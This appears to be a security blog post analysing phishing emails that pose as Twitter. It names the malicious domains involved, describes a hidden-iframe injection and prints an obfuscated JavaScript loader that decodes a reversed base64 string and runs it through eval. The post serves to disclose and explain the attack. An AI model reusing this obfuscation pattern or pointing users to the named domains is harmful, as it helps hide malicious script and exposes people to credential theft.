A new wave of attack has been intercepted. The contents of the email entice the end-user to click on the link.
Is that really from twitter?
As being observed, the links do not point to twitter, instead pointing to klubmonarhista.rs. The source code reveals an obfuscated javascript .
Obfuscated Script:
An obfuscated script looks like this
After de-obfuscation, it is revealed that this script creates a hidden IFrame and the source is being loaded from saprolaunimaxim.ru. Though at the time of writing this article the link was removed.
After de-obfuscation - replace eval with alert
When we tested both the links using our Statistical Phish Analyzer, it was being detected as a malicious link.
It is highly recommended to verify the link before you click. Ensure that if the email is from twitter then the link should take you to twitter and not to some other site.
Now a days, we are observing base64 encoded emails and email with an HTML attachment. Nothing new about it, however, upon decoding these , we find that they contain phishing content.
Some of these HTML file contains, obfuscated JS.
<!-- Oba by www.google.com --><script language="javascript"
type="text/javascript">var OI0='==wOpkSZwF2YzV2Xo.......
QzUyJ9UGchN2cl9FIyFmd';
var _0x84de=
["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=
","","charAt","indexOf","fromCharCode","length"];
function O1O(data)
{var OlOlOI=_0x84de[0];
var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc=_0x84de[1];
do{h1=OlOlOI[_0x84de[3]](data[_0x84de[2]](i++));
h2=OlOlOI[_0x84de[3]](data[_0x84de[2]](i++));
h3=OlOlOI[_0x84de[3]](data[_0x84de[2]](i++));
h4=OlOlOI[_0x84de[3]](data[_0x84de[2]](i++));
bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;
o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);
} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);
} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;}
while(i<data[_0x84de[5]]);;return enc;} ;function OlO(string)
{var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--)
{ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(O1O(OlO(OI0)));
</script>
The algorithm used to de-obfuscate is as follows:
The content of the variable OI0 is reversed Base64 encoded string, reverse the string and then apply base64 decode.
Upon successfully applying Base64_decode you will be presented with the actual HTML content and this will present to you with a phishing content.
This is how the HTML form looks on screen
